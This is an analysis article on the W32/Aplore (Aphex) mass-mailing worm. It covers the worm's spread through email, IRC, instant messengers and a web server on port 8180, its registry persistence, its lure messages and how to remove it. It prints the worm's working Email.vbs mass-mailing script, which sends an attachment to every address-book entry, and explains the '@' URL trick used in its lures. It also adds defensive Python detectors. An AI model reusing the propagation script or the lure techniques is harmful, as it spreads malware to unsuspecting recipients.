W32/Aplore-A

Also Known As: W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex,
W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex,
Psec, Win32/Aphex.Worm

Infection Length: 319,488 bytes (varies)

Article by Golcor

Description
Aplore is a mixture of tried and tested exploits; all of the code it uses
was previously available. It was simply cobbled together into a Delphi
executable and distributed in various ways:

Outlook Express email
mIRC IRC program
XiRC component for Delphi
AOL Instant Messenger (AIM)
MSN Messenger
A web server that it also drops

It is a mass-mailing worm that spreads by creating its own HTTP web server
on port 8180 and advertising it to IRC (Internet Relay Chat) and AIM (AOL
Instant Messenger) users in an attempt to entice them into running the worm.
When run, it creates a VBScript file in the Windows System directory,
%SysDir%\Email.vbs, that sends the worm to every entry in the Windows
Address Book, closes the Outlook application, and then deletes the Email.vbs
script.

It copies itself into the %System% folder, usually as
psecure20x-cgi-install6.01.bin.hx.com and explorer.exe. To ensure it starts
every time Windows is booted, it adds one of the registry values

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Explorer = "%SYSTEM%\[filename]"
or
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ResourceMonitor = "%SYSTEM%\[filename]"

The HTTP service it spawns on port 8180 serves an index.html file, dropped
by the main worm, as its default page. Anyone receiving a message from an
infected user is pointed to that page and risks infecting their own machine
if they download and run the file it offers.

If mIRC is installed on the infected machine on drive C:, D: or E:, in
either the Program Files or mirc folder, the worm drops a script and
overwrites the mirc.ini file. The script attempts to spread the worm the
next time mIRC is opened.

Technical Details
There are many variants of this worm. This description attempts to address
them all in one document.

The main component is written in Delphi and contains IRC spreading routines
and an embedded web server. When connected to IRC or AIM, it sends a Web
link to IRC channels or AIM contacts that points to the index.html file that
was dropped on the infected computer. This Web page asks the visitor to run
a copy of the worm.

If a user connects to the server, it sends the previously dropped
index.html. The initial component can have any name. Once it is executed it
drops three files:

One of: Syslog.js, Setup.js or Sex.js
Clean.vbs
Default.ini

Email
When the attached file is executed, the worm drops the file email.vbs. This
Visual Basic script then attempts to send an email to every person in the
Outlook Express address book. It includes an attachment called
Psecure20x-cgi-install.version.6.01.bin.hx.com. The Subject and Body of the
email are a single period (.) and the From field contains the name of the
infected computer. Once the worm closes Outlook, the script email.vbs is
deleted. The worm arrives attached to an email message containing the
following information:

Subject: .
Body: .
Attachment: psecure20x-cgi-install.version6.01.bin.hx.com

NB : The Subject and Body fields contain only a “.” (dot, period)

Email.vbs, which the worm creates, runs and then deletes, contains the
following code.

On Error Resume Next
Dim oFileSystemObject, sScript, sSystem, iIndex
Set oFileSystemObject = CreateObject("Scripting.FileSystemObject")
sScript = WScript.ScriptFullName
' GetSpecialFolder(1) is the Windows System directory, where the worm copy lives
sSystem = oFileSystemObject.GetSpecialFolder(1)
Set oOutLook = CreateObject("Outlook.Application")
' One message per entry in the first MAPI address list
For iIndex = 1 To oOutLook.GetNameSpace("MAPI").AddressLists(1).AddressEntries.Count
    Set mMail = oOutLook.CreateItem(0)
    mMail.To = oOutLook.GetNameSpace("MAPI").AddressLists(1).AddressEntries(iIndex)
    mMail.Subject = "."
    mMail.Body = "."
    mMail.Attachments.Add(sSystem & "\psecure20x-cgi-install.version6.01.bin.hx.com")
    mMail.Send
Next
OutLook.Quit
FileSystemObject.DeleteFile(sScript)
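
A mail-gateway check for messages of the shape described above, as an added
example that is not part of the original description or of the worm's own
code: it parses a message with Python's standard email module and reports the
lone-period Subject and Body, the known attachment name, and any directly
executable attachment. The sample message, the example.invalid addresses and
the base64 attachment payload (just the text "PLACEHOLDER") are constructed
for the example.

```python
from email import message_from_string

# Constructed sample shaped after the description above (not a real captured
# message): lone-period subject and body, plus an attachment named as the worm
# names it. The base64 payload decodes to the text "PLACEHOLDER".
SAMPLE_EML = """\
From: INFECTEDPC <infectedpc@example.invalid>
To: victim@example.invalid
Subject: .
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

.
--b1
Content-Type: application/octet-stream; name="psecure20x-cgi-install.version6.01.bin.hx.com"
Content-Disposition: attachment; filename="psecure20x-cgi-install.version6.01.bin.hx.com"
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--b1--
"""

# Extensions Windows runs directly when the attachment is opened
EXECUTABLE_EXTENSIONS = (".com", ".exe", ".scr", ".pif", ".bat", ".vbs", ".js")
WORM_ATTACHMENT_PREFIX = "psecure20x-cgi-install"


def first_text_body(msg):
    """Return the decoded text of the first non-attachment text/plain part, or ''."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and part.get_content_disposition() != "attachment":
            raw = part.get_payload(decode=True) or b""
            return raw.decode(part.get_content_charset() or "ascii", "replace")
    return ""


def attachment_names(msg):
    """Return the file names of all attachment parts."""
    return [p.get_filename() for p in msg.walk()
            if p.get_content_disposition() == "attachment" and p.get_filename()]


def aplore_indicators(raw_message):
    """Return the list of Aplore traits found in a raw RFC 822 message."""
    msg = message_from_string(raw_message)
    reasons = []
    if msg.get("Subject", "").strip() == ".":
        reasons.append("subject is a lone period")
    if first_text_body(msg).strip() == ".":
        reasons.append("body is a lone period")
    for name in attachment_names(msg):
        lowered = name.lower()
        if lowered.startswith(WORM_ATTACHMENT_PREFIX):
            reasons.append("attachment uses the worm's file name: " + name)
        elif lowered.endswith(EXECUTABLE_EXTENSIONS):
            reasons.append("executable attachment: " + name)
    return reasons


def should_quarantine(raw_message):
    """Quarantine when the worm's attachment name appears, or when the
    lone-period subject/body pattern coincides with an executable attachment."""
    reasons = aplore_indicators(raw_message)
    has_name = any(r.startswith("attachment uses") for r in reasons)
    has_exec = any(r.startswith("executable attachment") for r in reasons)
    lone_period = {"subject is a lone period", "body is a lone period"} <= set(reasons)
    return has_name or (lone_period and has_exec)


if __name__ == "__main__":
    for reason in aplore_indicators(SAMPLE_EML):
        print("-", reason)
    print("quarantine:", should_quarantine(SAMPLE_EML))
```

The attachment-name match is the strong signal; the lone-period pattern on
its own is kept as a supporting rule because any renamed variant would still
carry it.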

When the program is executed it copies itself to the Windows System
directory as EXPLORER.EXE, creates a file called IPHIST.DAT in the directory
the original file was run from before copying and adds a registry entry.
IPHIST.DAT is an empty file of 0 bytes and is completely harmless.
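
An added host-triage example (not part of the original description) that
checks for the artifacts described above from the output of standard Windows
tools rather than by touching the live registry: it parses reg query output
for the Explorer / ResourceMonitor Run values pointing into the System
directory, netstat -an output for a listener on port 8180, and a directory
listing for the dropped file names. The sample outputs below are constructed;
on a real host you would feed it the actual command output.

```python
import re

# Indicators taken from the description: the Run-key value names the worm adds,
# the port of its embedded web server, and the file names it drops.
RUN_VALUE_NAMES = {"explorer", "resourcemonitor"}
WORM_PORT = 8180
DROPPED_NAMES = {
    "psecure20x-cgi-install6.01.bin.hx.com",
    "psecure20x-cgi-install.version6.01.bin.hx.com",
    "email.vbs",
}

# Constructed sample of `reg query HKLM\...\CurrentVersion\Run` output.
# The real Explorer lives in the Windows directory and needs no Run entry,
# so a Run value pointing at System32\explorer.exe is the worm's persistence.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Explorer      REG_SZ    C:\WINDOWS\System32\explorer.exe
"""

# Constructed sample of `netstat -an` output (192.0.2.0/24 is documentation space)
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8180           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1043        192.0.2.20:6667        ESTABLISHED
"""


def suspicious_run_values(reg_query_output):
    """Return (name, data) for Run values named as the worm names them that
    point into the System directory."""
    hits = []
    for line in reg_query_output.splitlines():
        m = re.match(r"\s*(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)", line)
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        if name.lower() in RUN_VALUE_NAMES and re.search(r"\\system(?:32)?\\", data, re.I):
            hits.append((name, data))
    return hits


def worm_listeners(netstat_output, port=WORM_PORT):
    """Return local TCP endpoints from netstat output that listen on the worm's port."""
    found = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0].upper() == "TCP" and parts[3].upper() == "LISTENING":
            if parts[1].rsplit(":", 1)[-1] == str(port):
                found.append(parts[1])
    return found


def dropped_files(dir_listing):
    """Return names from a System-directory listing that match the worm's dropped files."""
    return sorted(name for name in dir_listing if name.lower() in DROPPED_NAMES)


if __name__ == "__main__":
    print("Run values:", suspicious_run_values(SAMPLE_REG_QUERY))
    print("Listeners on 8180:", worm_listeners(SAMPLE_NETSTAT))
    print("Dropped files:", dropped_files(["explorer.exe", "Email.vbs", "kernel32.dll"]))
```

A Run value pointing at an explorer.exe under the System directory is the
clearest of the three signs, since the genuine Explorer is started by Winlogon
and never from the Run key.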

AIM & MSN Messenger

Additional research shows that MSN Messenger users are also vulnerable to
infection and to spreading this worm. The worm hooks AIM and MSN Messenger
child windows by looking for their title-bar text. Once one of these
messenger windows is detected, it replaces the text in the window with the
following:

YourScreenName: btw, download this, (Your IP Address):8180

e.g. InfectedGuy: btw, download this, http://freeporn@127.0.0.1:8180

Other examples of the text used in spam messages sent from infected
computers via AIM and MSN:

I wanted to show you this,
please check this out,
hey go to,
download this,
see if you can get this to work,
this is cool,
tell me what you think about,
try this,
I almost forgot about,
I like this,
what about,
have you seen,
interesting,
lol,
wow,
whoa,
neat,
hmm,
psst,
hehe,
haha,
silly,
weird,
cool,

NB: In a web address, text preceding an @ is not treated as part of the
host address but as login credentials (user name and password). Entering
http://trythis@microsoft.com/ would take you to microsoft.com; the
"trythis@" part is ignored as far as the actual address is concerned.
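
As an added example (not part of the original article), the following
Python shows how a URL parser, here the standard urllib.parse, resolves the
lure links shown above: everything before the @ is user info and the host is
whatever follows it. It also scans a few IM log lines for links of that shape
or links pointing at the worm's port 8180. The log lines, sender names and the
192.0.2.10 address are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Matches http(s) links inside free text; trailing punctuation is stripped below.
URL_RE = re.compile(r'https?://[^\s<>"]+')


def lure_target(url):
    """Split a URL the way a browser does: what precedes '@' is user info
    (user name / password), and the host is whatever follows it."""
    p = urlsplit(url)
    try:
        port = p.port
    except ValueError:  # non-numeric port: treat as absent
        port = None
    return (p.username, p.hostname, port)


# Constructed IM log lines shaped after the lure text above (not real captures;
# 192.0.2.10 is documentation address space).
SAMPLE_IM_LOG = [
    "InfectedGuy: btw, download this, http://freeporn@127.0.0.1:8180",
    "aaren203: FREE PORN: http://freeporn@192.0.2.10:8180",
    "alice: have you seen http://www.example.com/news",
    "bob: lunch tomorrow?",
]


def flag_lures(lines, worm_port=8180):
    """Return (sender, url, real host) for messages whose link either hides the
    host behind user info or points at the worm's web-server port."""
    hits = []
    for line in lines:
        sender, _, text = line.partition(": ")
        for url in URL_RE.findall(text):
            url = url.rstrip(",.;!?)")
            username, host, port = lure_target(url)
            if username is not None or port == worm_port:
                hits.append((sender, url, host))
    return hits


if __name__ == "__main__":
    print(lure_target("http://freeporn@127.0.0.1:8180"))
    print(lure_target("http://trythis@microsoft.com/"))
    for sender, url, host in flag_lures(SAMPLE_IM_LOG):
        print(f"{sender}: {url} really points at {host}")
```

The real host, rather than the eye-catching text before the @, is what
belongs in a block list or an incident ticket; that is why flag_lures returns
p.hostname and not the raw link.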

IRC

If you use IRC, you are likely to receive messages like the ones below if
you are on any of the IRC.DAL.NET IRC servers.

Messages will be received from any of the nicknames below, each with a
randomly generated three-digit number appended to the end, e.g. aaren203.

1) The IRC part of the worm uses the legitimate XiRC component for Delphi,
written by Martin Bleakley, which does not depend on mIRC in any way. It
tries to connect to a server with a random nickname chosen from a list of
female names stored in the worm code, then tries to join random channels and
message people to visit the web page it created on the infected machine. The
message contains the text "FREE PORN:" and the IP address of the infected
computer.

2) Using one of the *.js files, Aplore drops c:\default.ini, which contains
a mIRC script. This script contains errors that prevent all of its code from
executing properly. The *.js file modifies every mirc.ini file it can find,
then deletes c:\default.ini. When mIRC is next started, it tries to send out
messages that point to the index.html file on the infected computer.

Webserver

When the server is started, it listens for connections on port 8180. The
page at the URL says that the user has to download a plugin to view the
content. Some variants include a REFRESH tag so that after one second the
page offers the worm file for download. If the user chooses to run the file,
it starts and infects the new system.

Solution

Do NOT reboot your machine.

If you have mIRC installed, ensure it is closed. Delete the mirc.ini file, as
it was overwritten by the virus code; mIRC will rewrite this file properly
when you next start it.

Delete the registry value the worm created under the Run key.

Scan your computer with the SwatIt trojan scanner or Trend's HouseCall online
scanner. Delete any file identified as Aphex or Aplore.

Restart your computer.